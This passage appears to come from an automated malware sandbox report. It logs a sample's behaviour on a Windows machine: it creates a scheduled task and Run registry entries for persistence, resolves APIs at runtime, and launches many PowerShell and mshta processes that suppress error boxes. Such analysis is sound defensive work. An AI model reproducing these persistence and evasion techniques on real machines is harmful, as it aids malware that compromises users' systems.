Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsECAFHIIJJE.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4136f86ac7.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4136f86ac7.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3160604f40.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3160604f40.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0ac2a0f3ae.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0ac2a0f3ae.exe

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6855F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C6855F0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
